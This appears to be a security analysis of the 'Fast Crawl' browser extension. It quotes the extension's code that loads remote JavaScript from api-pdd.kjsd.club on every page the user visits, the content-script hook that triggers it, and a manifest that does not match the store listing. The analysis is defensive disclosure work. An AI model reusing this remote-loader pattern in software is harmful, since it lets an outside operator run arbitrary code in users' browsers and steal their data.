Fast Crawl

Every page the user visits triggers injection of a remotely-hosted script from `api-pdd.kjsd.club`, a domain unrelated to the publisher. The `?t=<timestamp>` parameter busts the cache so fresh code is fetched on every page load, meaning the server operator can silently push arbitrary JavaScript onto all visited pages at any time. This grants the script full DOM access, network access, and the ability to steal credentials, capture form inputs, or exfiltrate page content without any further extension update.

// 注入jsfunction FastCrawlInjectJs(jsUrl) {  if (!jsUrl) return;  var temp = FastCrawlCreateElement('script', {    type: 'text/javascript',    src: jsUrl,    defer: true,    onload: function() {      this.parentNode.removeChild(this);    }  });  FastCrawlAppendElement('head', temp);}FastCrawlInjectJs('https://api-pdd.kjsd.club/static/js/fast-crawl-helper.js?t=' + (new Date())  .getTime())

The content script unconditionally calls `injectCustomJs()` on every page load (across all URLs matched by `http://*/*` and `https://*/*`), which then loads `inject.js`, which loads the remote third-party script. The attack surface is every page the user browses, not just specific targets.

// 监听当前页面dom加载完毕document.addEventListener('DOMContentLoaded', function() {      // 开始注入      injectCustomJs();      // 监听后台消息      chrome.runtime.onMessage.addListener(function(packages, sender, sendResponse) {

The bundled manifest is MV2 and declares no permissions, while the published CWS listing shows MV3 with `storage` and `tabs` permissions. The bundled `web_accessible_resources` also directly references the external third-party URL (`api-pdd.kjsd.club`), which is abnormal and confirms the remote injection is intentional. This manifest discrepancy between the installed binary and the CWS listing is itself a strong indicator of deceptive submission practices.

{  "manifest_version": 2,  "permissions": [],  "web_accessible_resources": [    "/js/inject.js",    "https://api-pdd.kjsd.club/static/js/fast-crawl-helper.js"  ]}